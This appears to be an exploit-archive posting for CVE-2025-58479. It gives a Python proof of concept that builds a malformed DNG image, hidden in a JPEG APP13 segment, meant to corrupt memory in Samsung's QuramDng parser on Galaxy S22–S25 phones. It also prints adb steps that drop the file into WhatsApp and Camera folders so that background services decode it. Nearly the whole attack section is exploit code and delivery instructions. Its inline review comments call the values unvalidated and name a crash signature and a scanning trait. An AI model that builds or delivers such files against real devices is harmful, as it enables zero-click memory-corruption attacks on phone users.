| Title | Published | Views | Family |
|---|---|---|---|
| SAMSUNG Mobile devices 安全漏洞 | 2 Dec 2025 00:00 | – | cnnvd |
| CVE-2025-58479 | 2 Dec 2025 01:24 | – | cve |
| CVE-2025-58479 | 2 Dec 2025 01:24 | – | cvelist |
| EUVD-2025-200139 | 2 Dec 2025 01:24 | – | euvd |
| Vulnerabilities fixed in Google Android and Samsung Mobile | 2 Dec 2025 13:25 | – | ncsc |
| CVE-2025-58479 | 2 Dec 2025 02:15 | – | nvd |
| CVE-2025-58479 | 2 Dec 2025 02:15 | – | osv |
| PT-2025-48597 | 2 Dec 2025 00:00 | – | ptsecurity |
| CVE-2025-58479 | 3 Dec 2025 14:02 | – | redhatcve |
| CVE-2025-58479 | 2 Dec 2025 01:24 | – | vulnrichment |
=============================================================================================================================================
| # Title : Samsung QuramDng Out-of-Bounds Read/Write via Malicious DNG Embedded in JPEG |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.samsung.com/us/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/213367/ & CVE-2025-58479
[+] Summary : This proof-of-concept targets an out-of-bounds read/write vulnerability in Samsung’s QuramDng image parser, affecting Galaxy S22–S25 devices running One UI 6+.
The file is a malformed DNG whose OpcodeList1 abuses the FixBadPixelsList opcode, embedded inside a JPEG container; the parser processes the invalid pixel coordinates without proper bounds checking.
When the file is handled by system components such as com.samsung.ipservice, Media Scanner, or Samsung Gallery, the malformed metadata can trigger memory corruption and result in a crash (SIGSEGV) within libimagecodec.quram.so. Because the steps below rely on these components processing a stored file on their own, the practical mitigation is the vendor firmware update that fixes CVE-2025-58479, and a crash report naming libimagecodec.quram.so is the indicator to look for on an unpatched device.
[+] POC :
#!/usr/bin/env python3
import struct
import sys
import os
def create_malicious_dng():
    """Return the DNG (TIFF-structured) sample bytes used by this PoC.

    Layout, in the order written:
      * 8-byte little-endian TIFF header pointing at an IFD at offset 8;
      * an IFD entry count of 5, four LONG entries for the image and tile
        dimensions, and one entry for tag 51008 (OpcodeList1);
      * two further 32-bit words after the IFD entries;
      * a 36-byte opcode block;
      * 1024 * 32 * 2 zero bytes standing in for raw image data.

    NOTE(review): the field values are reproduced as published. Nothing in
    this file checks them against the TIFF/DNG specification or against a
    device, so treat the result as an unvalidated sample for parser
    regression testing rather than as a confirmed trigger.
    """
    long_type = 4  # TIFF field type LONG
    dimension_entries = (
        (256, long_type, 1, 1024),  # ImageWidth
        (257, long_type, 1, 32),    # ImageLength
        (322, long_type, 1, 1024),  # TileWidth
        (323, long_type, 1, 32),    # TileLength
    )

    buf = bytearray(b'II\x2A\x00')    # byte order "II" + TIFF magic 42
    buf += struct.pack('<I', 8)       # offset of the first IFD
    buf += struct.pack('<H', 5)       # declared number of IFD entries
    for tag, field_type, count, value in dimension_entries:
        buf += struct.pack('<HHII', tag, field_type, count, value)

    # Tag 51008 (OpcodeList1), type BYTE, declared count 100. The value
    # field is filled with an offset computed from the current length.
    buf += struct.pack('<HHI', 51008, 1, 100)
    opcode_offset = len(buf) + 4
    buf += struct.pack('<III', opcode_offset, 0, opcode_offset)

    # Opcode block: 29 packed bytes, zero-padded to 36.
    # NOTE(review): how these values map onto DNG opcode fields is not
    # established anywhere in this file.
    opcode_block = struct.pack(
        '<HHIIB8H',
        1, 36, 0x00030001, 0x41414141, 0,
        1, 1, 32, 0, 0, 0, 1, 1,
    ).ljust(36, b'\x00')
    buf += opcode_block

    buf += bytes(1024 * 32 * 2)  # Minimal raw image data
    return bytes(buf)
def create_poc_jpeg_wrapper():
    """Return JPEG-framed bytes that carry the DNG sample in an APP13 segment.

    Segments are emitted in this order: SOI + APP0 (JFIF), COM (a text
    comment naming the CVE), APP13 (the bytes from create_malicious_dng()),
    DQT, SOF0, DHT, a few trailing bytes, EOI.

    For scanning purposes, the structural trait visible here is a TIFF
    header ("II*\\x00") sitting directly at the start of an APP13 segment
    body.

    Raises:
        struct.error: if a segment body plus its 2-byte length field does
            not fit the 16-bit big-endian length that '>H' can encode.
    """
    comment = b"Malicious DNG for CVE-2025-58479"
    # Evaluation order matches the published script: the comment length is
    # packed first, then the DNG sample is built, then its length is packed.
    segments = [
        b'\xFF\xD8\xFF\xE0',                                   # SOI, APP0 marker
        b'\x00\x10',                                           # APP0 length
        b'JFIF\x00\x01\x02\x00\x00\x64\x00\x64\x00\x00',       # JFIF body
        b'\xFF\xFE',                                           # COM marker
        struct.pack('>H', len(comment) + 2),
        comment,
    ]

    dng_data = create_malicious_dng()
    segments.append(b'\xFF\xED')                               # APP13 marker
    segments.append(struct.pack('>H', len(dng_data) + 2))
    segments.append(dng_data)

    segments.extend((
        b'\xFF\xDB',                                           # DQT marker
        b'\x00\x43\x00\x03\x02\x02\x02\x02\x02\x03\x02\x02\x02\x03\x03\x03\x03\x04\x06\x04\x04\x04\x04\x04\x08\x06\x06\x05\x06\x09\x08\x0A\x0A\x09\x08\x09\x09\x0A\x0C\x0F\x0C\x0A\x0B\x0E\x0B\x09\x09\x0D\x11\x0D\x0E\x0F\x10\x10\x11\x10\x0A\x0C\x12\x13\x12\x10\x13\x0F\x10\x10\x10\x01',
        b'\xFF\xC0',                                           # SOF0 marker
        b'\x00\x0B\x08\x00\x01\x00\x01\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01',
        b'\xFF\xC4',                                           # DHT marker
        b'\x00\x1F\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B',
        # Trailing bytes reproduced as published.
        b'\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00',
        b'\x00',
        b'\xFF\xD9',                                           # EOI marker
    ))
    return b''.join(segments)
def main():
    """Write the sample to the working directory and print the author's steps.

    The file name is fixed ("poc_cve_2025_58479.jpeg"). The adb commands and
    the expected crash signature are only printed; this function executes
    none of them.
    """
    print("[*] Creating PoC for CVE-2025-58479 - Samsung QuramDng OOB Vulnerability")
    print("[*] Affected: Samsung Galaxy S22-S25 with One UI 6+")

    blob = create_poc_jpeg_wrapper()
    filename = "poc_cve_2025_58479.jpeg"
    with open(filename, "wb") as out:
        out.write(blob)

    # Everything below is console output only.
    report = (
        f"[+] Created malicious file: {filename}",
        f"[+] File size: {len(blob)} bytes",
        "\n[*] To test on device:",
        f" adb push {filename} /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/Media/WhatsApp\\ Images/",
        f" adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:///storage/emulated/0/Android/media/com.whatsapp/WhatsApp/Media/WhatsApp%20Images/{filename}",
        "\n[*] Wait ~5 minutes for com.samsung.ipservice to process the file",
        "[*] Expected: Crash in libimagecodec.quram.so with SIGSEGV",
        "\n[*] Alternative test with Gallery:",
        f" adb push {filename} /storage/emulated/0/DCIM/Camera/",
        f" adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:///storage/emulated/0/DCIM/Camera/{filename}",
        "\n[*] Open Samsung Gallery to trigger decode",
    )
    for line in report:
        print(line)
# Run main() only when this file is executed as a script, not when imported.
if __name__ == "__main__":
    main()
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================